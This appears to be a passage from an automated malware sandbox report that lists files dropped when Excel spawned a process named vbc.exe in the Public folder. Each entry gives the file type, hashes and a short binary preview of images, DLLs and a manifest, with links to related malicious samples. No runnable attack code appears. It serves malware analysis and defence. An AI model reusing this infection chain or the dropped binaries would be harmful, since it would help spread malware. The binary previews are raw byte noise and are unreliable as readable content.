                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):5396
                  Entropy (8bit):7.915293088075047
                  Encrypted:false
                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                  Malicious:false
                  Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):2647
                  Entropy (8bit):7.8900124483490135
                  Encrypted:false
                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                  MD5:E46357D82EBC866EEBDA98FA8F94B385
                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                  Malicious:false
                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):10202
                  Entropy (8bit):7.870143202588524
                  Encrypted:false
                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                  Malicious:false
                  Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):5396
                  Entropy (8bit):7.915293088075047
                  Encrypted:false
                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                  Malicious:false
                  Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):10202
                  Entropy (8bit):7.870143202588524
                  Encrypted:false
                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                  Malicious:false
                  Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):11303
                  Entropy (8bit):7.909402464702408
                  Encrypted:false
                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                  Malicious:false
                  Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):1099960
                  Entropy (8bit):2.0152800116954332
                  Encrypted:false
                  SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
                  MD5:BD4C089D8210CF4FCF74013334B2B925
                  SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
                  SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
                  SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
                  Malicious:false
                  Preview:....l...............C...........m>...&.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...`....f.x.@h.%...<...............d...RQUQ............L.......$QUQ........ ...Id.x........ ............d.x............M....................Oq.....%...X...%...7...................{$..................C.a.l.i.b.r.i............................8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):60648
                  Entropy (8bit):6.273540391388373
                  Encrypted:false
                  SSDEEP:768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
                  MD5:00B917A158BB5BF0D6BFF7D6B3C81B12
                  SHA1:24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
                  SHA-256:947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
                  SHA-512:47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Joe Sandbox View:
                  • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P..K1.K1.K1.BIX.G1..Y.I1....J1..Y.D1..Y.C1..Y.H1.BIO.J1.BIH.J1.8S.N1.K1..1..X.H1..X.J1..X4.J1.K1\.J1..X.J1.RichK1.................PE..d....5;a.........." .........j...............................................0...... .....`.........................................`...................H.................... ..4.......p............................................... ............................text............................... ..`.rdata.. -..........................@..@.data...`'..........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..4.... ......................@..B................................................................................................................................................................................................................
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):36576
                  Entropy (8bit):6.18658407883376
                  Encrypted:false
                  SSDEEP:384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
                  MD5:0B849C073801DCE25301ECA0146D534B
                  SHA1:5BB9251CA83FE96C8F52B35637E674A629ED1468
                  SHA-256:3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
                  SHA-512:1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
                  Malicious:false
                  Joe Sandbox View:
                  • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                  • Filename: DWG-1579.exe, Detection: malicious, Browse
                  • Filename: RFQ-1579.exe, Detection: malicious, Browse
                  • Filename: DWG-1579.exe, Detection: malicious, Browse
                  • Filename: RFQ-1579.xlsx, Detection: malicious, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.%.>.v.>.v.>.v.FNv.>.v.\.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.`.w.>.v.>.v.>.v!W.w.>.v!W.w.>.v!W"v.>.v.>Jv.>.v!W.w.>.vRich.>.v........................PE..d......a.........." .....>...\.......@.................................................... .........................................pd..l....d.......................p..........H....T..p...........................`U...............P...............................text....<.......>.................. ..`.rdata.......P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................
                  Process:C:\Users\Public\vbc.exe
                  File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1070
                  Entropy (8bit):4.836891219007383
                  Encrypted:false
                  SSDEEP:24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
                  MD5:9B48061E7B9FC35CD2624F2B9102549E
                  SHA1:9DA640A8AF809549031916AB143026FAAF3B1E74
                  SHA-256:84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
                  SHA-512:01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
                  Malicious:false
                  Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0
                  Process:C:\Users\Public\vbc.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):77432
                  Entropy (8bit):6.5191464617024995
                  Encrypted:false
                  SSDEEP:1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
                  MD5:0CAED7F18389A6CC24391E0400C2BE47
                  SHA1:59288CED440D46970090F25983B409BB25F43BBF
                  SHA-256:E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
                  SHA-512:AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
                  Malicious:false
                  Preview:....f.f.....GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&..l..._............}.a;'a..g*Y.DN.Ql.`.(+#;......%3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6...............O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..g*Y.DN.Ql.`.(+#;......1.......k..|3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.......n....."q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..g*Y.DN.Ql.`.(+#;......%3...4.*..:.............]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV.......f.........p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS.
                  Process:C:\Users\Public\vbc.exe
                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):288
                  Entropy (8bit):7.002703251110111
                  Encrypted:false
                  SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
                  MD5:A83F8C904AFA9E3F6A50D263747CF6DF
                  SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
                  SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
                  SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
                  Malicious:false
                  Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.
                  Process:C:\Users\Public\vbc.exe
                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):893
                  Entropy (8bit):7.712327619290152
                  Encrypted:false
                  SSDEEP:12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
                  MD5:473EE416AF2C1AE05AA7D5D004C9B3D2
                  SHA1:EEC352E25F562C0386D5C92384A70B3005D40D6F
                  SHA-256:2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
                  SHA-512:2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
                  Malicious:false
                  Preview:.PNG........IHDR................a...DIDATx.e.C..H.F_..tzl{m.m.m.m..;=F+..j.......r.........hZ...%Sn...Z....|g...o.c..f..k..#.Y.5..2...r44.t...[|.EW....E..3v....o...n...y.V.%.\g.].XY.).PQ..h~.Mu.:I.~.!{dt...-....c........~.ihs..<.23h.q...AA....P.O.d.#....S%....w....~(.Yg.mL.`..r.U?A.D......%.t..~.b..wl...G\r.......,^m.b%..??...?./........O..w\|..t..5...^x....cK..?..b...3^#i.xYp3.>..C<Q.yg^.3.=..;./..!.`.....dq%...`..wB....q.2....W....S`....E....q3.A....9...."..].+.f...-.Z)d*..h..O>......c>...=.P..!...pw}g..t&.=..Dd...i.f......\....-JO0hW....!.ic.%...s.+...iG|..MK...O_..;_.q_....|...F....M...O...o..5.=...y{...]hn..Z..L+..`r.&I...5t._Dz..m.~$n$..|.u}_.n|.53..b.+Zn.bCA.1..x..hv?.{8...!\J......>OukN..{...[#.....7....k..L.#...D.y:K5.|.&..XV.U..rb..T..G..6.I...~.....i.#ike...9/B_&.....^v]..._.l.Et.i..M..l.B1...A.....>._...P.,... ....IEND.B`.
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):5.814115788739565
                  Encrypted:false
                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                  MD5:CFF85C549D536F651D4FB8387F1976F2
                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):214568
                  Entropy (8bit):6.30310219025288
                  Encrypted:false
                  SSDEEP:3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
                  MD5:6D01A897D44DD4D25D7E1264407210FD
                  SHA1:332C3ADE84D0C1E5BE298C037F9FE222620343B2
                  SHA-256:DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
                  SHA-512:54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...#.B..........P..........d....................................2.....`... ......................................P.......`......................."..($..................................@...(....................c..8............................text....A.......B..................`.P`.data........`.......F..............@.`..rdata..\....p.......H..............@.`@.pdata..............................@.0@.xdata....... ......................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X...........................@.@..tls................................@.@..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
